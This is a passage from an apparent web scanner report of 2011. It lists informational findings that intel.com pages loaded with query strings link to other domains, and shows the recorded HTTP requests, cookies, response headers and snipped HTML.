</h2><a href="http://www.intc.com" onclick="var s='s_gs()'; waCustomLink(this,'','e','wa_iid=intel_info+body_investimg')"><img src="/intel/pix/company-info_tn4.jpg" alt="Investor Relations" width="98" height="58" class="imgfloat" title="Investor Relations" />
...[SNIP]...
<li><a href="http://www.intc.com" onclick="var s='s_gs()'; waCustomLink(this,'','e','wa_iid=intel_info+body_investtxt')"><strong>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.96. http://www.intel.com/intel/corpresponsibility/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /intel/corpresponsibility/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/intel/corpresponsibility/index.htm?iid=gg_about+intel_gcr
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /intel/corpresponsibility/index.htm?iid=gg_about+intel_gcr HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:07 GMT
Content-Length: 31356
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Intel Corporate Responsibility &mdash; With Leadership
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.97. http://www.intel.com/intel/rss.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /intel/rss.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/intel/rss.htm?iid=ftr+rss
The response contains the following links to other domains:
  • http://apps.shareholder.com/rss/rss.aspx?companyid=INTC&channels=5148
  • http://feeds.feedburner.com/IntelBlogs
  • http://feeds.feedburner.com/intel/jobs
  • http://server.iad.liveperson.net/hc/s-77025620/cmd/kbresource/kb-3790937018273883745/front_page!PAGETYPE?VisitorProfile=Corporate&category=1
  • http://www.download.com/RSS-Tools/3150-9227-0.html?tag=ne.rss
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /intel/rss.htm?iid=ftr+rss HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39033

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>
<!-- DOC-FACTORY Generated Tags BEGIN -->
<TITLE>Intel RSS Feeds</TITLE>
<meta name = "creation_date" co
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Intel Business Feed" href="http://rss.intel.com/rss/intel-business-content.xml">
<link rel="alternate" type="application/rss+xml" title="Intel Investor Relations" href="http://apps.shareholder.com/rss/rss.aspx?companyid=INTC&channels=5148">

<!-- Alternate Row Colors ( ARC ) -->
...[SNIP]...
<div class="leftNavLink pad8pxBottom"><a href="http://server.iad.liveperson.net/hc/s-77025620/cmd/kbresource/kb-3790937018273883745/front_page!PAGETYPE?VisitorProfile=Corporate&category=1">Company FAQ</a>
...[SNIP]...
<td valign="top" class="dataNoLine"><a href="http://apps.shareholder.com/rss/rss.aspx?companyid=INTC&channels=5148" target="blank_"><img src="/intel/pix/rss.gif" width="36" height="14" alt="RSS" border="0" />
...[SNIP]...
<td valign="top" class="dataNoLine"><a href="http://feeds.feedburner.com/intel/jobs" target="blank_"><img src="/intel/pix/rss.gif" width="36" height="14" alt="RSS" border="0" />
...[SNIP]...
<td valign="top" class="dataNoLine"><a href="http://feeds.feedburner.com/IntelBlogs" target="blank_"><img src="/intel/pix/rss.gif" width="36" height="14" alt="RSS" border="0" />
...[SNIP]...
<br />
       <a href="http://www.download.com/RSS-Tools/3150-9227-0.html?tag=ne.rss" class="sectionlink" target="_blank">Directory of RSS readers</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.98. http://www.intel.com/itcenter/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/index.htm?iid=gg_work+home_it
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /itcenter/index.htm?iid=gg_work+home_it HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:36 GMT
Content-Length: 30149
Connection: close

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us">
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.99. http://www.intel.com/itcenter/industry/education/overview.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/industry/education/overview.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/industry/education/overview.htm?iid=subhdr+itc_edu
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /itcenter/industry/education/overview.htm?iid=subhdr+itc_edu HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39695

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us">
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.100. http://www.intel.com/itcenter/industry/fsi/overview.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/industry/fsi/overview.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/industry/fsi/overview.htm?iid=subhdr+itc_fsi
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /itcenter/industry/fsi/overview.htm?iid=subhdr+itc_fsi HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39772

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us">
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.101. http://www.intel.com/itcenter/itatintel/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/itatintel/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/itatintel/?iid=SEARCH
The response contains the following links to other domains:
  • http://itunes.apple.com/us/podcast/intel-it/id406217336
  • http://twitter.com/ITatIntel
  • http://www-2.virtualevents365.com/intelipip/index.php?page=agenda
  • http://www.brighttalk.com/community/data-center/channel/5360
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.linuxfordevices.com/c/a/News/Intel-2011-tech-predictions/

Request

GET /itcenter/itatintel/?iid=SEARCH HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69396

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us">
...[SNIP]...
<p style="margin: 7px 10px; font-weight: bold;"><a href="http://itunes.apple.com/us/podcast/intel-it/id406217336" target="blank" title="Subscribe to Intel IT white papers and podcasts ">Subscribe to Intel IT white papers and podcasts&nbsp;&gt;</a>
...[SNIP]...
<p style="margin: 7px 10px; font-weight: bold;"><a href="http://www.brighttalk.com/community/data-center/channel/5360" target="blank" title="View our data center webcasts">View our data center webcasts&nbsp;&gt;</a>
...[SNIP]...
<p style="margin: 7px 10px 0 10px; font-weight: bold;"><a href="http://twitter.com/ITatIntel" target="blank" title="Follow Intel IT on Twitter">Follow Intel IT on Twitter&nbsp;&gt;</a>
...[SNIP]...
<li><a href="http://www.linuxfordevices.com/c/a/News/Intel-2011-tech-predictions/" title="Intel CIO helps predict top 11 trends for 2011" target="_blank">Intel CIO helps predict top 11 trends for 2011</a>
...[SNIP]...
<li><a href="http://www-2.virtualevents365.com/intelipip/index.php?page=agenda" title="Virtual Seminar for IT Professionals" target="_blank">Virtual event for IT professionals (view now)</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.102. http://www.intel.com/itcenter/itatintel/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/itatintel/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/itatintel/index.htm?iid=subhdr+itc_itatintel
The response contains the following links to other domains:
  • http://itunes.apple.com/us/podcast/intel-it/id406217336
  • http://twitter.com/ITatIntel
  • http://www-2.virtualevents365.com/intelipip/index.php?page=agenda
  • http://www.brighttalk.com/community/data-center/channel/5360
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.linuxfordevices.com/c/a/News/Intel-2011-tech-predictions/

Request

GET /itcenter/itatintel/index.htm?iid=subhdr+itc_itatintel HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69396

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us">
...[SNIP]...
<p style="margin: 7px 10px; font-weight: bold;"><a href="http://itunes.apple.com/us/podcast/intel-it/id406217336" target="blank" title="Subscribe to Intel IT white papers and podcasts ">Subscribe to Intel IT white papers and podcasts&nbsp;&gt;</a>
...[SNIP]...
<p style="margin: 7px 10px; font-weight: bold;"><a href="http://www.brighttalk.com/community/data-center/channel/5360" target="blank" title="View our data center webcasts">View our data center webcasts&nbsp;&gt;</a>
...[SNIP]...
<p style="margin: 7px 10px 0 10px; font-weight: bold;"><a href="http://twitter.com/ITatIntel" target="blank" title="Follow Intel IT on Twitter">Follow Intel IT on Twitter&nbsp;&gt;</a>
...[SNIP]...
<li><a href="http://www.linuxfordevices.com/c/a/News/Intel-2011-tech-predictions/" title="Intel CIO helps predict top 11 trends for 2011" target="_blank">Intel CIO helps predict top 11 trends for 2011</a>
...[SNIP]...
<li><a href="http://www-2.virtualevents365.com/intelipip/index.php?page=agenda" title="Virtual Seminar for IT Professionals" target="_blank">Virtual event for IT professionals (view now)</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.103. http://www.intel.com/itcenter/products/atom/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/products/atom/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/products/atom/index.htm?iid=subhdr+itc_atom
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /itcenter/products/atom/index.htm?iid=subhdr+itc_atom HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
